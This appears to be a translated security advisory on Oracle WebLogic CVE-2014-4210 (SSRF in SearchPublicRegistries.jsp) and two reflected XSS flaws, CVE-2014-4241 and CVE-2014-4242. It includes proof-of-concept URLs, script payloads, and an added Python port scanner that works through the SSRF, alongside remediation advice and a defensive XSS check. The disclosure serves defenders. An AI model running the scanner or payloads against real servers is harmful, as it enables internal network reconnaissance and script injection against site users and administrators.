WebLogic SSRF vulnerability (brief translation)


[Ref]http://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html

WebLogic SSRF and XSS (CVE-2014-4241, CVE-2014-4210, CVE-2014-4242)


Universal Description Discovery and Integration (UDDI) functionality often lurks unlinked but externally accessible on WebLogic servers. It is trivially discoverable using fuzz lists such as Weblogic.fuzz.txt and was, until recently, vulnerable to Cross Site Scripting (XSS) and Server Side Request Forgery (SSRF). I reported these vulnerabilities to Oracle and they were patched in the July 2014 Critical Patch Update (CPU).

CVE-2014-4210 Server Side Request Forgery in SearchPublicRegistries.jsp

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6

The Oracle WebLogic web server is often both (a) externally accessible and (b) permitted to open connections to internal hosts. The SearchPublicRegistries.jsp page can be abused by unauthenticated attackers to make the WebLogic web server connect to an arbitrary TCP port on an arbitrary host. The responses returned are fairly verbose and can be used to infer whether a service is listening on the specified port.

Below is an example request to an internal host which is not listening on TCP port 23:


https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:23&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Connection refused


Below is an example request to a host which is listening on TCP port 22:


https://[vulnerablehost]/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.0.0.4:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search


Response snippet:

weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.0.0.4:22 which did not have a valid SOAP content-type: unknown/unknown.


It is possible to abuse this functionality to discover and port scan any host that the WebLogic server can reach: "Connection refused" means nothing is listening, while the "did not have a valid SOAP content-type" error means something answered. In the event that a discovered service returns a valid SOAP response, it may be possible to view the contents of that response.

SSRF vulnerabilities offer a world of possibilities – for example, this could be used to scan for services and resources present on the WebLogic server’s loopback interface, to port scan hosts adjacent to the WebLogic server, or to profile outgoing firewall rules (e.g. port scan an external attacker-controlled server to see which outgoing connections are permitted).
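The following is an added example, not code from the GDS post or from Oracle. It turns the SearchPublicRegistries.jsp behaviour described above into a port scanner by classifying WebLogic's verbose error responses. The two error strings are the ones quoted in the response snippets on this page; the base URL, the target host, the port list and the offline `fake_fetch` client are constructed for illustration.

```python
"""
Port scanning through CVE-2014-4210 (added example, not from the original post).
The 'operator' parameter of SearchPublicRegistries.jsp is the URL WebLogic
connects to; the error text that comes back says whether the port was open.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable
from urllib.parse import urlencode

SSRF_PATH = "/uddiexplorer/SearchPublicRegistries.jsp"


def build_ssrf_url(base: str, target_host: str, target_port: int) -> str:
    """Build the request from the page's proof of concept: only 'operator'
    matters, the remaining parameters are the form's filler values."""
    params = {
        "operator": f"http://{target_host}:{target_port}",
        "rdoSearch": "name",
        "txtSearchname": "sdf",
        "txtSearchkey": "",
        "txtSearchfor": "",
        "selfor": "Business location",
        "btnSubmit": "Search",
    }
    return base.rstrip("/") + SSRF_PATH + "?" + urlencode(params)


# Signatures taken from the two response snippets quoted on this page.
CLOSED_RE = re.compile(r"XML_SoapException: Connection refused")
OPEN_RE = re.compile(
    r"XML_SoapException: Received a response from url: \S+ "
    r"which did not have a valid SOAP content-type"
)


def classify(body: str) -> str:
    """Map a response body to a port state. Anything matching neither
    signature (a timeout on a filtered port, or a genuine SOAP reply from
    the target) is reported as 'unknown' rather than guessed."""
    if CLOSED_RE.search(body):
        return "closed"
    if OPEN_RE.search(body):
        return "open"
    return "unknown"


def scan(base: str, target_host: str, ports: Iterable[int],
         fetch: Callable[[str], str]) -> Dict[int, str]:
    """Scan target_host via the WebLogic server at `base`, one request per port."""
    return {port: classify(fetch(build_ssrf_url(base, target_host, port)))
            for port in ports}


def live_fetch(url: str) -> str:
    """Real HTTP client. If the server returns the error on a non-2xx status,
    urllib raises; the body is read from the exception so the signature is kept."""
    try:
        with urllib.request.urlopen(url, timeout=20) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


def fake_fetch(url: str) -> str:
    """Constructed stand-in for live_fetch so the example runs offline:
    emulates a target with TCP 22 and 80 open and everything else closed."""
    match = re.search(r"operator=http%3A%2F%2F([\d.]+)%3A(\d+)", url)
    host, port = match.group(1), int(match.group(2))
    if port in (22, 80):
        return ("weblogic.uddi.client.structures.exception.XML_SoapException: "
                f"Received a response from url: http://{host}:{port} which did "
                "not have a valid SOAP content-type: unknown/unknown.")
    return ("weblogic.uddi.client.structures.exception.XML_SoapException: "
            "Connection refused")


if __name__ == "__main__":
    # Swap fake_fetch for live_fetch to run against a real, authorised target.
    results = scan("https://vulnerablehost.example", "10.0.0.4",
                   [22, 23, 80, 443], fake_fetch)
    for port, state in sorted(results.items()):
        print(f"10.0.0.4:{port} {state}")
```

Because WebLogic makes one outbound connection per request, scanning a `/24` through it is slow and noisy; the "unknown" state is kept separate on purpose, since a slow timeout on a firewalled port looks nothing like either of the two quoted errors and should not be reported as closed.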

CVE-2014-4241 - Reflected Cross Site Scripting in SetupUDDIExplorer.jsp

Affected software: Oracle Fusion Middleware 10.0.2, 10.3.6

User input is reflected into a cookie value (which is set for a year!). This value is then written into subsequent responses in an unsafe manner, exposing users to Cross Site Scripting attacks.

This unusual vector circumvents the in-browser anti-XSS controls present in Internet Explorer and Chrome at the time, since the payload reaches the page in a cookie on a later request rather than in the query string of the request whose response it appears in. The vulnerability was present in registration.paypal.com, payflowlink.paypal.com and partnermanager.paypal.com; all were swiftly fixed after I reported this to the PayPal security team.

Reflected XSS in registration.paypal.com

Example Malicious URL:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL

The response stores the supplied privateregistry parameter value in the privateinquiryurls cookie and redirects the browser back to the SetupUDDIExplorer.jsp page:

HTTP/1.1 302 Moved Temporarily
Location: https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp
Set-Cookie: privateinquiryurls=<script>alert(2)</script>; expires=Saturday, 29-Nov-2014 08:00:27 GMT
Content-Length: 331
Content-Type: text/html;charset=UTF-8


Redirected Request:

GET /uddiexplorer/SetupUDDIExplorer.jsp HTTP/1.1
Host: [vulnerablehost]
Cookie: publicinquiryurls=http://www-3.ibm.com/services/uddi/inquiryapi!IBM|http://www-3.ibm.com/services/uddi/v2beta/inquiryapi!IBM V2|http://uddi.rte.microsoft.com/inquire!Microsoft|http://services.xmethods.net/glue/inquire/uddi!XMethods|; privateinquiryurls=<script>alert(2)</script>; privatepublishurls=http://[vulnerablehost]:8080/uddi/uddilistener; consumer_display=HOME_VERSION%3d1%26FORGOT_BUTTON_ROLE%3d73; cookie_check=yes; LANG=en_US%3BUS; navlns=0.0;

Response Snippet (showing the privateinquiryurls cookie value reflected in an unsafe manner in the response):

<td valign=top width=1%></td>
<td valign=top width=70%>
  <p>
  <h2>Private Registry:</h2>
  <h3>Search URL: <b><script>alert(1)</script></b></h3>
  <H3>Publish URL: <b>http://[vulnerablehost]:8080/uddi/uddilistener</b></h3>
  </p>

Example Proof of Concept URLs:

https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryInquiry=Set+Search+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?privateregistry=<script>alert(2)</script>&setPrivateRegistryPublish=Set+Publish+URL
https://[vulnerablehost]/uddiexplorer/SetupUDDIExplorer.jsp?publicregistryname=test&publicregistryurl=<script>alert(2)</script>&addPublicRegistry=Add+Public+Registry+URL
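The following is an added example, not code from the GDS post, PayPal or Oracle. It reproduces the two-step flow above as a check (cookie set by the 302, value reflected on the redirected page) and places it next to the two controls that would have prevented it. The Set-Cookie header and the HTML fragment are the ones quoted on this page; the function names are this example's own.

```python
"""
Cookie-then-reflect XSS check for CVE-2014-4241 (added example, not from the
original post) plus the input validation and output encoding that fix it.
"""
import html
from typing import Optional
from urllib.parse import urlsplit


def cookie_value(set_cookie_header: str, name: str) -> Optional[str]:
    """Return the value assigned to `name` in a raw Set-Cookie header.
    Parsed by hand: the first 'name=value' pair is the cookie, everything
    after the first ';' is attributes such as the one-year Expires."""
    first = set_cookie_header.split(";", 1)[0].strip()
    key, sep, value = first.partition("=")
    return value if sep and key == name else None


def reflected_unescaped(value: str, body: str) -> bool:
    """True when `value` contains HTML metacharacters and appears in `body`
    verbatim, i.e. it was written out without output encoding."""
    return html.escape(value, quote=True) != value and value in body


def validate_registry_url(candidate: str) -> str:
    """Control 1, input validation: a registry URL must be an absolute http(s)
    URL with a host, so '<script>...' or 'javascript:...' never reaches a cookie."""
    parts = urlsplit(candidate)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError(f"not an http(s) registry URL: {candidate!r}")
    return candidate


def render_search_url(value: str) -> str:
    """Control 2, output encoding: escape on the way into the HTML body no
    matter where the value came from (here, a cookie the browser sent back)."""
    return f"<h3>Search URL: <b>{html.escape(value, quote=True)}</b></h3>"


# Step one: the 302 from SetupUDDIExplorer.jsp?privateregistry=... (quoted on this page).
SET_COOKIE = ("privateinquiryurls=<script>alert(2)</script>; "
              "expires=Saturday, 29-Nov-2014 08:00:27 GMT")
# Step two: the redirected GET carries the cookie and the page writes it out raw.
VULNERABLE_BODY = "<h3>Search URL: <b><script>alert(2)</script></b></h3>"


def check_page(set_cookie_header: str, body: str) -> bool:
    """Report whether the cookie set in step one is reflected unescaped in step two."""
    value = cookie_value(set_cookie_header, "privateinquiryurls")
    return value is not None and reflected_unescaped(value, body)


if __name__ == "__main__":
    payload = cookie_value(SET_COOKIE, "privateinquiryurls")
    print("vulnerable page reflects cookie unescaped:",
          check_page(SET_COOKIE, VULNERABLE_BODY))
    print("hardened rendering:", render_search_url(payload))
    try:
        validate_registry_url(payload)
    except ValueError as err:
        print("input validation rejects it:", err)
```

Both controls are needed: validation alone still leaves a stored-in-cookie value that other code paths may print, and encoding alone must be chosen per context. The consolejndi.portal case further down injects into a JavaScript string inside a `<script>` block, where HTML escaping is the wrong tool; the captured snippet there shows `\u0027` escaping applied to one copy of the value but not to the copy embedded in the URL, which is exactly the inconsistency that leaves it exploitable.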

CVE-2014-4242 - Reflected Cross Site Scripting in consolejndi.portal

Affected Software: Oracle Fusion Middleware 10.0.2, 10.3.6, 12.1.1, 12.1.2.0.0

I've also identified two reflected XSS vulnerabilities in WebLogic's console application. The console application is intended to manage the WebLogic application server and is not normally externally exposed; as a result, exploitation of this vulnerability would be targeted at admin users.

Example Proof of Concept URL #1 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_pageLabel=JNDIContextPageGeneral&_nfpb=true&JNDIContextPortlethandle=com.bea.console.handles.JndiContextHandle("<script>alert(1)</script>")


Response Snippet:

<div class="contenttable"><div class="introText">
<p>Listing of entries found in context <script>alert(1)</script>:</p>
</div>


Example Proof of Concept URL #2 (victim must be authenticated to the administrative console):

http://[vulnerablehost]:7001/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//


Response Snippet:

<script type="text/javascript">
document.write('<div class="JSTree">');
setBaseDirectory('/console/utils/JStree/images/');
setTaxonomyDelimeter('.');
{
_a = new TreeNode('server', null, 'myserver\u0027);alert(4)//', '/console/consolejndi.portal?_nfpb=true&_pageLabel=JNDIHomePage&server=myserver');alert(1)//', 'images/spacer.gif', 'images/spacer.gif', null, 'myserver\u0027);alert(4)//', false, false);


Remediation

Remove access to the UDDI functionality (the /uddiexplorer/ application) unless there is a business case for exposing it. Failing that, ensure that the July 2014 CPU has been applied.


Disclosure Timeline
01/12/2013 - Vulnerability Reported
07/16/2014 - Vulnerability Patch Released in Oracle Critical Patch Update (CPU)

